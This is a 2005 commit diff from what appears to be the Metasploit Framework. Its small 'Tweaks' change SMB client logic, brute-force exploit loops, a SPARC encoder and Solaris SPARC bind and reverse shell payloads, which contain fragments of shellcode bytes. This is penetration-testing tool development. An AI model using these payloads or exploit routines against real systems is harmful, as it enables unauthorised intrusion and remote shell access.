Tweaks

git-svn-id: file:///home/svn/incoming/trunk@3286 4d416f70-5f16-0410-b530-b9f4589650da
2005-12-31 18:03:02 +00:00 · 2005-12-31 18:03:02 +00:00 · f468b10cff
parent f3252ec6f8
commit f468b10cff
8 changed files with 20 additions and 8 deletions
--- a/lib/msf/core/exploit/brute.rb
+++ b/lib/msf/core/exploit/brute.rb
@ -87,6 +87,9 @@ module Exploit::Brute
 			# Keep going until we run out of options
 			while (curr.length != stopped.length)

+				# Stop brute forcing once a session is found
+				break if session_created?
+	
 				# Fire off an exploit attempt with the supplied addresses
 				brute_exploit(curr)

--- a/lib/msf/core/exploit/brutetargets.rb
+++ b/lib/msf/core/exploit/brutetargets.rb
@ -21,7 +21,7 @@ def exploit(*args)
 		
 		targets.each_index do |i|
 			next if i == 0
-			
+			break if session_created?
 			print_status("Trying target #{targets[i].name}...")
 			exploit_target(targets[i])
 		end
--- a/lib/msf/core/exploit/smb.rb
+++ b/lib/msf/core/exploit/smb.rb
@ -30,7 +30,7 @@ module Exploit::Remote::SMB
 	
 		register_advanced_options(
 		[
-            OptBool.new('SMBPipeEvasion',     [ true, 'enable segmented read/writes for SMB Pipes', 'False']),
+			OptBool.new('SMBPipeEvasion',     [ true, 'Enable segmented read/writes for SMB Pipes', 'False']),
 			OptInt.new('SMBPipeWriteMinSize', [ true, 'Minimum buffer size for pipe writes',  1]),
 			OptInt.new('SMBPipeWriteMaxSize', [ true, 'Maximum buffer size for pipe writes', 1024]),
 			OptInt.new('SMBPipeReadMinSize',  [ true, 'Minimum buffer size for pipe reads',  1]),
@ -51,7 +51,10 @@ module Exploit::Remote::SMB
 	end

    def connect()
-        super
+        
+		disconnect()
+		
+		super
    
 		self.simple = SIMPLE.new(self.sock, datastore['SMBDirect'])

--- a/lib/rex/proto/smb/client.rb
+++ b/lib/rex/proto/smb/client.rb
@ -622,6 +622,12 @@ EVADE = Rex::Proto::SMB::Evasions
 		self.smb_send(pkt.to_s)
 		ack = self.smb_recv_parse(CONST::SMB_COM_SESSION_SETUP_ANDX, true)
 		
+		
+		# The server doesn't know about NTLM_NEGOTIATE, try ntlmv1
+		if (ack['Payload']['SMB'].v['ErrorClass'] == 0x00020002)
+			return session_setup_ntlmv1(user, pass, domain)
+		end
+		
 		# Make sure the error code tells us to continue processing
 		if (ack['Payload']['SMB'].v['ErrorClass'] != 0xc0000016)
 			failure = XCEPT::ErrorCode.new
--- a/modules/encoders/sparc/optyx.rb
+++ b/modules/encoders/sparc/optyx.rb
@ -4,7 +4,7 @@ module Msf
 module Encoders
 module Sparc

-class LongXor < Msf::Encoder::Xor
+class LongXor < Msf::Encoder::XorAdditiveFeedback

 	def initialize
 		super(
--- a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb
+++ b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb
@ -25,7 +25,7 @@ module ShellBindTcp
 	end

 	def generate
-		port    = (datastore['RPORT'] || 0).to_i
+		port    = (datastore['RPORT'] || '0').to_i
 		payload = 
 			"\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b" +
 			"\x92\x10\x20\x02\x90\x10\x20\x02\x82\x10\x20\xe6\x91\xd0\x20\x08" +
--- a/modules/payloads/singles/solaris/sparc/shell_find_port.rb
+++ b/modules/payloads/singles/solaris/sparc/shell_find_port.rb
@ -25,7 +25,7 @@ module ShellFindPort
 	end

 	def generate
-		port    = (datastore['CPORT'] || 0).to_i
+		port    = (datastore['CPORT'] || '0').to_i
 		payload = 
 			Rex::Arch::Sparc.set(port, "l0") +
 			"\x9c\x2b\xa0\x07\x90\x1a\x80\x0a\xd0\x23\xbf\xe8\x90\x02\x20\x01" +
--- a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb
@ -26,8 +26,8 @@ module ShellReverseTcp
 	end

 	def generate
-		port    = (datastore['RPORT'] || '0').to_i 
-		host    = Rex::Socket.resolv_nbo_i(datastore['RHOST'] || '127.0.0.1')
+		port    = (datastore['LPORT'] || '0').to_i 
+		host    = Rex::Socket.resolv_nbo_i(datastore['LHOST'] || '127.0.0.1')

 		payload =
 			"\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b" +